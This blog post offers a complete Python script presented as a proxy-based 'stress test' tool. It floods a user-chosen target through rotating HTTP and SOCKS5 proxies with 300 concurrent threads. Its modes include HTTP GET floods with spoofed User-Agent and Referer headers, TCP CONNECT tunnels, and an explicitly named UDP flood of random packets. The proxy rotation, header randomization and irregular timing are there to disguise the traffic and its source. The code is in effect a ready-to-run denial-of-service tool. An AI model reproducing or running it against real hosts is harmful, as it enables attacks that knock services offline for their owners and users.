banner
DarianBlog

DarianBlog

达里安博客-专注于技术分享与交流的博客。博客致力于创造一个简单而直接的技术学习平台。
email
telegram

使用http或socks5代理进行测压的脚本

import requests
import concurrent.futures
import time
import os
import threading
import socket
import socks 
import random # NEW: 导入 random 库以增加随机性

# --- 配置参数 ---
# HTTP/TCP 模式使用的代理文件路径
INPUT_HTTP_PROXY_FILE = 'working_proxies.txt'
# UDP 模式使用的 SOCKS5 代理文件路径
INPUT_SOCKS5_PROXY_FILE = 'working_socks5_proxies.txt' 
# 单次请求的超时时间(秒)
TIMEOUT = 10 
# 最大并发线程数 (应设置得较高,以达到最大访问量)
MAX_WORKERS = 300 
# 任务提交的随机延迟范围(秒)。例如 0.005 到 0.05 秒,用于模拟不规律的点击间隔。
MIN_SUBMISSION_DELAY = 0.005 
MAX_SUBMISSION_DELAY = 0.05
# ------------------

# 线程安全的计数器
success_count = 0
fail_count = 0
lock = threading.Lock()

# 动态配置变量(在运行时由用户输入设置)
TARGET_HOST = None 
TARGET_PORT = None
TARGET_URL = None
ACCESS_MODE = None
RUN_DURATION_SECONDS = 0 

# 常用且真实的 User-Agent 列表 (用于模拟不同的浏览器)
USER_AGENTS = [
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5; rv:127.0) Gecko/20100101 Firefox/127.0',
    'Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1',
    'Mozilla/5.0 (iPad; CPU OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1',
    'Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36',
]

# 随机 Referer 列表 (模拟请求来源)
REFERERS = [
    'https://www.google.com/',
    'https://www.bing.com/',
    'https://duckduckgo.com/',
    'https://t.co/', # 模拟 Twitter/X 跳转
    'https://www.facebook.com/',
    'https://www.reddit.com/',
    'https://www.zhihu.com/',
    'https://t.cn/', # 模拟微博短链
    'https://news.baidu.com/',
    'http://localhost/', # 模拟内部链接
    'https://www.wikipedia.org/'
]


def load_proxies(file_path):
    """从文件加载代理列表,返回 IP:PORT 列表"""
    if not os.path.exists(file_path):
        print(f"❌ 错误: 找不到代理文件: {file_path}")
        return []
    
    with open(file_path, 'r') as f:
        proxies = [p.strip() for p in f.readlines() if p.strip()]
    
    if not proxies:
        print("❌ 错误: 代理文件中没有有效数据。")
    return proxies

def visit_target(proxy, request_id):
    """通过指定的代理或直接访问目标 URL"""
    global success_count, fail_count, TARGET_URL, ACCESS_MODE, TIMEOUT, TARGET_HOST, TARGET_PORT
    
    if not ACCESS_MODE:
        with lock:
            fail_count += 1
        return
        
    # --- 模式 1: HTTP GET 请求 (使用 requests) ---
    if ACCESS_MODE == 'HTTP_GET':
        if not TARGET_URL:
             with lock: fail_count += 1
             return
             
        try:
            proxy_ip, proxy_port = proxy.split(':')
        except ValueError:
            proxy_ip, proxy_port = "Invalid", 0
        
        proxies = {
            'http': f'http://{proxy}',
            'https': f'http://{proxy}',
        }
        
        # NEW: 随机化请求头 (Randomize headers)
        headers = {
            'User-Agent': random.choice(USER_AGENTS), # 随机选择一个User-Agent
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', # 模拟接受中文/英文
            'Connection': 'keep-alive',
            'Upgrade-Insecure-Requests': '1',
            'Referer': random.choice(REFERERS) # NEW: 随机的 Referer
        }
        
        try:
            # 发送请求
            response = requests.get(
                TARGET_URL, 
                proxies=proxies, 
                timeout=TIMEOUT,
                headers=headers, # 使用随机化后的请求头
                verify=False # 禁用SSL验证
            )
            
            # 检查响应状态码
            if response.status_code < 500: 
                with lock:
                    success_count += 1
            else:
                 with lock:
                    success_count += 1
                
        except requests.exceptions.RequestException:
            with lock:
                fail_count += 1
        except Exception:
            with lock:
                fail_count += 1

    # --- 模式 2: 裸 TCP 连接测试 (使用 socket) ---
    elif ACCESS_MODE == 'TCP_CONNECT':
        if not TARGET_HOST or not TARGET_PORT:
             with lock: fail_count += 1
             return
             
        try:
            proxy_ip, proxy_port = proxy.split(':')

            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(TIMEOUT)
            
            # 尝试连接代理本身
            s.connect((proxy_ip, int(proxy_port)))
            
            # 如果连接成功,尝试发送 HTTP CONNECT 请求(隧道建立)
            # 虽然是TCP连接,但我们依然可以随机化User-Agent,以防部分代理检查
            user_agent = random.choice(USER_AGENTS)
            connect_request = f"CONNECT {TARGET_HOST}:{TARGET_PORT} HTTP/1.1\r\nHost: {TARGET_HOST}\r\nUser-Agent: {user_agent}\r\n\r\n"
            s.sendall(connect_request.encode('utf-8'))
            
            # 接收响应
            response = s.recv(4096).decode('utf-8')
            s.close()
            
            # 检查代理是否返回 200 Connection established
            if "200 Connection established" in response:
                 with lock:
                    success_count += 1
            else:
                with lock:
                    fail_count += 1

        except Exception:
            with lock:
                fail_count += 1
    
    # --- 模式 3: UDP FLOOD (通过 SOCKS5 代理发送) ---
    elif ACCESS_MODE == 'UDP_FLOOD':
        if not TARGET_HOST or not TARGET_PORT:
             with lock: fail_count += 1
             return
             
        try:
            # 1. 拆分 SOCKS5 代理信息
            proxy_ip, proxy_port = proxy.split(':')
            
            # 2. 创建 SOCKS 代理套接字 (使用 SOCK_DGRAM 进行 UDP)
            s = socks.socksocket(socket.AF_INET, socket.SOCK_DGRAM) 
            s.set_proxy(socks.SOCKS5, proxy_ip, int(proxy_port))
            s.settimeout(TIMEOUT)
            
            # 简单负载 (1024 字节)
            payload = os.urandom(1024) 
            
            # 3. 发送数据包。socks.sendto 会通过 SOCKS5 代理的 UDP 中继进行转发
            s.sendto(payload, (TARGET_HOST, TARGET_PORT))
            s.close()
            
            with lock:
                success_count += 1
        except Exception:
            with lock:
                fail_count += 1
                
    else:
        # 模式错误处理
        print(f"警告: 无效的 ACCESS_MODE: {ACCESS_MODE}")
        with lock:
            fail_count += 1


def batch_visit(proxies):
    """批量执行并发访问任务,持续指定时长"""
    global ACCESS_MODE, success_count, fail_count, MAX_WORKERS, RUN_DURATION_SECONDS
    
    run_duration_seconds = RUN_DURATION_SECONDS
    start_time = time.time()
    end_time = start_time + run_duration_seconds
    
    total_requests_submitted = 0
    
    if len(proxies) == 0:
        print("没有可用的代理,无法执行任务。程序终止。")
        return

    print(f"开始持续访问任务。目标时长: {run_duration_seconds / 60:.1f} 分钟, 访问模式: {ACCESS_MODE}, 并发数: {MAX_WORKERS}")
    
    stop_monitoring = threading.Event()
    
    def monitor_status():
        """实时监控任务状态"""
        while not stop_monitoring.is_set():
            time.sleep(1) # 每 1 秒更新一次
            
            completed_tasks = success_count + fail_count
            elapsed_time = time.time() - start_time
            rps = completed_tasks / elapsed_time if elapsed_time > 0 else 0
            
            # 实时进度输出
            progress_line = (
                f"\r[运行中] 持续时间: {elapsed_time:.1f}s / {run_duration_seconds}s | "
                f"已提交: {total_requests_submitted} | 成功: {success_count} | 失败: {fail_count} | RPS: {rps:.2f} req/s"
            )
            print(progress_line, end="", flush=True)

    monitor_thread = threading.Thread(target=monitor_status)
    monitor_thread.start()

    
    try:
        with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
            i = 0
            num_proxies = len(proxies)
            
            # 持续提交循环
            while time.time() < end_time:
                # 循环使用代理列表
                proxy_to_use = proxies[i % num_proxies]
                
                # 提交任务
                executor.submit(visit_target, proxy_to_use, i + 1)
                i += 1
                total_requests_submitted = i
                
                # NEW: 引入随机提交延迟,模拟用户操作的不规律性
                sleep_time = random.uniform(MIN_SUBMISSION_DELAY, MAX_SUBMISSION_DELAY)
                time.sleep(sleep_time) 
            
            # 任务提交时间结束
            print(f"\n[时间到] 任务提交停止。已提交 {total_requests_submitted} 个请求。等待运行中的任务完成...")
            
    finally:
        # 确保监控线程停止
        stop_monitoring.set()
        if monitor_thread.is_alive():
             monitor_thread.join()
        
    # 3. 结果总结
    end_time_final = time.time()
    total_time = end_time_final - start_time
    final_rps = (success_count + fail_count) / total_time if total_time > 0 else 0

    print("\n--- 任务总结 ---")
    print(f"总运行时间: {total_time:.2f} 秒 (包含提交期和清理期)")
    print(f"总请求提交数: {total_requests_submitted}")
    print(f"成功访问数: {success_count}")
    print(f"失败数: {fail_count}")
    print(f"平均速度 (RPS): {final_rps:.2f} 请求/秒")


if __name__ == '__main__':
    # 1. 代理列表和模式初始化
    working_proxies = []
    
    # --- 交互式配置 ---
    print("\n--- 访问模式选择 ---")
    print("1. HTTP/HTTPS GET 请求 (通过 HTTP 代理访问 Web 服务)")
    print("2. TCP CONNECT 隧道连接 (通过 HTTP 代理连接 IP:PORT)")
    print("3. UDP FLOOD (通过 SOCKS5 代理连接 IP:PORT)")
    
    mode_choice = input("请选择访问模式 (输入 1, 2 或 3): ").strip()
    
    # 根据模式加载不同的代理文件
    if mode_choice == '1' or mode_choice == '2':
        working_proxies = load_proxies(INPUT_HTTP_PROXY_FILE)
        print(f"\n已加载 {len(working_proxies)} 个 HTTP 代理。")
        if not working_proxies:
             print("HTTP/TCP 模式需要有效代理列表,但列表为空。程序终止。")
             exit()
             
    elif mode_choice == '3':
        working_proxies = load_proxies(INPUT_SOCKS5_PROXY_FILE)
        print(f"\n已加载 {len(working_proxies)} 个 SOCKS5 代理。")
        if not working_proxies:
             print("UDP_FLOOD 模式需要有效 SOCKS5 代理列表,但列表为空。程序终止。")
             exit()

    else:
        print("输入无效,程序终止。")
        exit()
        
    # --- 设置模式和目标 ---
    if mode_choice == '1':
        ACCESS_MODE = 'HTTP_GET'
        TARGET_URL = input("请输入目标 URL (例如 http://httpbin.org/ip): ").strip() # 默认目标改为httpbin

    elif mode_choice == '2':
        ACCESS_MODE = 'TCP_CONNECT'
        target_input = input("请输入目标 IP:PORT (例如 192.168.1.1:8080): ").strip()
        
        try:
            TARGET_HOST, TARGET_PORT = target_input.split(':')
            TARGET_PORT = int(TARGET_PORT)
        except ValueError:
            print("目标格式错误。请确保输入格式为 IP:PORT。程序终止。")
            exit()
             
    elif mode_choice == '3':
        ACCESS_MODE = 'UDP_FLOOD'
        target_input = input("请输入目标 IP:PORT (例如 192.168.1.1:53): ").strip()

        try:
            TARGET_HOST, TARGET_PORT = target_input.split(':')
            TARGET_PORT = int(TARGET_PORT)
        except ValueError:
            print("目标格式错误。请确保输入格式为 IP:PORT。程序终止。")
            exit()
        
    # --- 设置运行时间 ---
    try:
        duration_minutes = input("请输入持续访问时长(分钟,例如 5):").strip()
        RUN_DURATION_SECONDS = int(duration_minutes) * 60
        if RUN_DURATION_SECONDS <= 0:
            print("持续时长必须大于 0,程序终止。")
            exit()
    except ValueError:
        print("无效的时长输入,程序终止。")
        exit()

    print(f"目标: {TARGET_HOST}:{TARGET_PORT}" if ACCESS_MODE != 'HTTP_GET' else f"目标 URL: {TARGET_URL}")
    
    # 2. 批量并发访问
    batch_visit(working_proxies)

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.